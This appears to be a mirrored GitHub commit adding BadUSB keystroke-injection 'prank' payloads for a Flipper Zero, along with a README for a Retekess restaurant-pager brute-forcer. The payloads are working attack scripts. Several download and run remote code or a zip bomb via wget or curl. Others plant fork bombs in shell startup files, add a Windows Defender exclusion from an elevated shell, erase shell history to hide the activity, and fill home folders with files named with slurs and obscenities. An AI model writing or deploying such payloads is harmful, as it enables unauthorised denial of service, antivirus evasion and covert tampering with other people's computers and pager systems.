mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-21 13:10:12 +00:00
Merge pull request #78 from FalsePhilosopher/main
added updated t119 brute/readme and badusb bombs
This commit is contained in:
commit
fe08aac49b
18
BadUSB/Bombs/File_Bomb/Linuxpy.txt
Normal file
18
BadUSB/Bombs/File_Bomb/Linuxpy.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
REM Title: File Bomb Tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04.
|
||||||
|
REM Props: Hak5, PauloVicente89 for the py script I modified for linux and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches a terminal, background wgets the py script and runs it.
|
||||||
|
REM
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRING nohup wget https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/File_bomb/PLTUX.py 2>/dev/null && python3 PLTUX.py 2>/dev/null & disown
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
18
BadUSB/Bombs/File_Bomb/LinuxpyBF.txt
Normal file
18
BadUSB/Bombs/File_Bomb/LinuxpyBF.txt
Normal file
File diff suppressed because one or more lines are too long
19
BadUSB/Bombs/File_Bomb/Linuxsh.txt
Normal file
19
BadUSB/Bombs/File_Bomb/Linuxsh.txt
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
REM Title: File bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, the community and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches a terminal, spawns 420 txt files in each home dir, home, and root. Change the 420 to 100000 or something if you want more files.
|
||||||
|
REM
|
||||||
|
REM initialization delay
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
STRING nohup cd /Home/Pictures && touch {1..420}.txt 2>/dev/null & cd /Home/Documents && touch {1..420}.txt 2>/dev/null & cd /Home/Music && touch {1..420}.txt 2>/dev/null & cd /Home/Videos && touch {1..420}.txt 2>/dev/null & cd /Home/Desktop && touch {1..420}.txt 2>/dev/null & cd /dev/shm && touch {1..420}.txt 2>/dev/null & cd .. && touch {1..420}.txt 2>/dev/null & disown
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
26
BadUSB/Bombs/File_Bomb/LinuxshWL.txt
Normal file
26
BadUSB/Bombs/File_Bomb/LinuxshWL.txt
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
REM Title: File bomb word list tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, strippers and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM changes to all the main dir's in home, then home, then root and creates negative named files in each
|
||||||
|
REM
|
||||||
|
REM initialization delay
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
REM adjust delay as needed
|
||||||
|
DELAY 1500
|
||||||
|
REM sneak +1 don't delete the whole history or mess with size settings, just turn history off and delete the history change entry ;)
|
||||||
|
STRING set +o history
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING nohup cd /Home/Pictures && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Documents && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Music && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Videos && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Desktop && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick && history | grep history && line=$(history | grep history | awk '{ print $1 }') && history -d $line && set -o history &
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 300
|
||||||
|
ALT F4
|
20
BadUSB/Bombs/File_Bomb/LinuxshWLevil.txt
Normal file
20
BadUSB/Bombs/File_Bomb/LinuxshWLevil.txt
Normal file
File diff suppressed because one or more lines are too long
20
BadUSB/Bombs/File_Bomb/LinuxshWLmean.txt
Normal file
20
BadUSB/Bombs/File_Bomb/LinuxshWLmean.txt
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
REM Title: File bomb word list tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, strippers and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM changes to all the main dir's in home, then home, then root and creates negative named files in each, mean version which I used gpt3 to generate longer word list for a meaner script. Apparently I can only get it to say poopoo head over and over, so this is what I mined lol.
|
||||||
|
REM
|
||||||
|
REM initialization delay
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
STRING nohup cd /Home/Pictures && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Documents && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Music && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Videos && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Desktop && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain &
|
||||||
|
DELAY 2000
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
17
BadUSB/Bombs/File_Bomb/LinuxshWLmean_bluepill.txt
Normal file
17
BadUSB/Bombs/File_Bomb/LinuxshWLmean_bluepill.txt
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
REM Title: File bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, strippers and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Reverse to the mean quack to not make your friends hate you, changes to all the main dir's in home, then home, then root and deletes negative named files in each.
|
||||||
|
REM initialization delay
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
STRING cd /Home/Pictures && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Documents && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Music && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Videos && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Desktop && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd .. && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd .. && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain
|
||||||
|
DELAY 2000
|
||||||
|
ENTER
|
18
BadUSB/Bombs/Folder_Bomb/Linuxbash.txt
Normal file
18
BadUSB/Bombs/Folder_Bomb/Linuxbash.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
REM Title: Folder Bomb Tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04.
|
||||||
|
REM Props: Hak5, the community and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches a terminal, spawns 420 folders in each home dir, home, and root. Change the 420 to 100000 or something if you want more folders.
|
||||||
|
REM
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRING nohup cd /Home/Pictures && mkdir folder{1..420} 2>/dev/null & cd /Home/Documents && mkdir folder{1..420} 2>/dev/null & cd /Home/Music && mkdir folder{1..420} 2>/dev/null & cd /Home/Videos && mkdir folder{1..420} 2>/dev/null & cd /Home/Desktop && mkdir folder{1..420} 2>/dev/null & cd .. && mkdir folder{1..420} 2>/dev/null & cd .. && mkdir folder{1..420} 2>/dev/null & disown
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
18
BadUSB/Bombs/Folder_Bomb/Linuxpy.txt
Normal file
18
BadUSB/Bombs/Folder_Bomb/Linuxpy.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
REM Title: Folder Bomb Tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04.
|
||||||
|
REM Props: Hak5, PauloVicente89 for the py script I modified for linux and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches a terminal, background wgets the py script and runs it. It created about 100k folders in about 5 seconds from my testing.
|
||||||
|
REM
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRING nohup wget https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/Folder_Bomb/PLTUX.py 2>/dev/null && python3 PLTUX.py 2>/dev/null & disown
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
18
BadUSB/Bombs/Folder_Bomb/LinuxpyBF.txt
Normal file
18
BadUSB/Bombs/Folder_Bomb/LinuxpyBF.txt
Normal file
File diff suppressed because one or more lines are too long
21
BadUSB/Bombs/Sys_Forker/ForkBomb-Linuxmean.txt
Normal file
21
BadUSB/Bombs/Sys_Forker/ForkBomb-Linuxmean.txt
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
REM Title: terminal bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, drapl0n for the OG termbomb, the community and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Recon
|
||||||
|
REM Starts a forkbomb every time they open a terminal, if you want a more elequently written one check out drapl0n's PL as this is just a basic one liner. Simple but effective with less points of failure.
|
||||||
|
REM Lamp oil, rope? Bombs! You want it? It's yours my friend! As long as you have enough Rupees!
|
||||||
|
REM
|
||||||
|
REM initialization delay
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
STRING echo ":(){ :|:& };:" >> ~/.zshrc && echo ":(){ :|:& };:" >> ~/.bashrc
|
||||||
|
DELAY 300
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
20
BadUSB/Bombs/Sys_Forker/Forkbomb-Win_10-11.txt
Normal file
20
BadUSB/Bombs/Sys_Forker/Forkbomb-Win_10-11.txt
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
REM Title: Win forkbomb, thread shitter or ryzen temps
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target:10-11
|
||||||
|
REM Props: Hak5, da3m0n s3c for the one liner https://da3m0ns3c.blogspot.com/2017/04/fork-bomb-in-several-language-implements.html, the community and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches terminal and spawns a forkbomb on every thread the system reports that then spawns shells that spawn forkbombs. It spawned about 850 processes in 15 seconds, there is no stopping it so be careful testing this thing is NASTY! It takes 5-10 sec to spin up the run pools so it's not immediate.
|
||||||
|
REM
|
||||||
|
DELAY 300
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING cmd.exe
|
||||||
|
CTRL-SHIFT ENTER
|
||||||
|
DELAY 1500
|
||||||
|
SHIFT TAB
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING echo %0^|%0 > fb.bat&&powershell -w h $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(C:\Windows\System32\fb.bat);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke()
|
||||||
|
ENTER
|
18
BadUSB/Bombs/Zip_Bomb/Linux/quack.txt
Normal file
18
BadUSB/Bombs/Zip_Bomb/Linux/quack.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
REM Title: Zip bomb tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, strippers and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence.
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
REM FIRE IN THE HOLE!
|
||||||
|
STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & disown
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
18
BadUSB/Bombs/Zip_Bomb/Linux/quackBF.txt
Normal file
18
BadUSB/Bombs/Zip_Bomb/Linux/quackBF.txt
Normal file
File diff suppressed because one or more lines are too long
18
BadUSB/Bombs/Zip_Bomb/Linux/quackmean.txt
Normal file
18
BadUSB/Bombs/Zip_Bomb/Linux/quackmean.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
REM Title: Zip bomb tux style
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Unix-like tested on kubuntu 22.04
|
||||||
|
REM Props: Hak5, strippers and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence. This version launches one in tmp, $HOME and /dev/shm wtih history covering
|
||||||
|
DELAY 300
|
||||||
|
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
REM FIRE IN THE HOLE!
|
||||||
|
STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & unzip 42.zip -d /dev/shm 2>/dev/null & unzip 42.zip -d $HOME 2>/dev/null & disown
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
ALT F4
|
18
BadUSB/Bombs/Zip_Bomb/Linux/quackmeanBF.txt
Normal file
18
BadUSB/Bombs/Zip_Bomb/Linux/quackmeanBF.txt
Normal file
File diff suppressed because one or more lines are too long
19
BadUSB/Bombs/Zip_Bomb/Win/quack.txt
Normal file
19
BadUSB/Bombs/Zip_Bomb/Win/quack.txt
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
REM Title: Zip Bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Win, tested on 10
|
||||||
|
REM Props: Hak5, friends and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches zip bomb
|
||||||
|
REM
|
||||||
|
REM startup delay
|
||||||
|
DELAY 300
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell Start-Process powershell -Verb runAs
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
ALT y
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; Expand-Archive -Path 42.zip -Force
|
||||||
|
ENTER
|
19
BadUSB/Bombs/Zip_Bomb/Win/quackloop.txt
Normal file
19
BadUSB/Bombs/Zip_Bomb/Win/quackloop.txt
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
REM Title: Zip Bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Win, tested on 10
|
||||||
|
REM Props: Hak5, friends and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches zip bomb and openes another after that one is done.
|
||||||
|
REM
|
||||||
|
REM startup delay
|
||||||
|
DELAY 300
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell Start-Process powershell -Verb runAs
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
ALT y
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; while (1) { Expand-Archive -Path 42.zip -Force; }
|
||||||
|
ENTER
|
19
BadUSB/Bombs/Zip_Bomb/Win/quackpara.txt
Normal file
19
BadUSB/Bombs/Zip_Bomb/Win/quackpara.txt
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
REM Title: Zip Bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Win, tested on 10
|
||||||
|
REM Props: Hak5, friends and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
|
||||||
|
REM
|
||||||
|
REM startup delay
|
||||||
|
DELAY 300
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell Start-Process powershell -Verb runAs
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
ALT y
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;$NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke()
|
||||||
|
ENTER
|
19
BadUSB/Bombs/Zip_Bomb/Win/quackparaloop10.txt
Normal file
19
BadUSB/Bombs/Zip_Bomb/Win/quackparaloop10.txt
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
REM Title: Zip Bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Win, tested on 10
|
||||||
|
REM Props: Hak5, friends and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
|
||||||
|
REM
|
||||||
|
REM startup delay
|
||||||
|
DELAY 300
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell Start-Process powershell -Verb runAs
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
ALT y
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;while (1) { $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke(); }
|
||||||
|
ENTER
|
21
BadUSB/Bombs/Zip_Bomb/Win/quackparaloop11.txt
Normal file
21
BadUSB/Bombs/Zip_Bomb/Win/quackparaloop11.txt
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
REM Title: Zip Bomb
|
||||||
|
REM Author: FalsePhilosopher
|
||||||
|
REM Target: Win, alt for possible 10/11 launch untested
|
||||||
|
REM Props: Hak5, friends and memes
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Prank
|
||||||
|
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
|
||||||
|
REM
|
||||||
|
REM startup delay
|
||||||
|
DELAY 300
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
CTRL-SHIFT ENTER
|
||||||
|
DELAY 1500
|
||||||
|
SHIFT TAB
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;while (1) { $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke(); }
|
||||||
|
ENTER
|
13
Sub-GHz/Restaurant_Pagers/Retekess_Pagers/T119/README.md
Normal file
13
Sub-GHz/Restaurant_Pagers/Retekess_Pagers/T119/README.md
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
# t119bruteforcer
|
||||||
|
|
||||||
|
Original repo: https://github.com/xb8/t119bruteforcer
|
||||||
|
|
||||||
|
Retekess pager system t119 bruteforcer for the flipper zero
|
||||||
|
|
||||||
|
updated bruteforcer is t119bruteforcerupdated.sub, prefer this one
|
||||||
|
the other sub files are from the old research, they still work but are partially correct
|
||||||
|
|
||||||
|
special thanks to @ShotokanZH for the amazing work!
|
||||||
|
|
||||||
|
https://twitter.com/xenobyte_/status/1554222170888339456
|
||||||
|
https://twitter.com/xenobyte_/status/1558123251276070912
|
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue
Block a user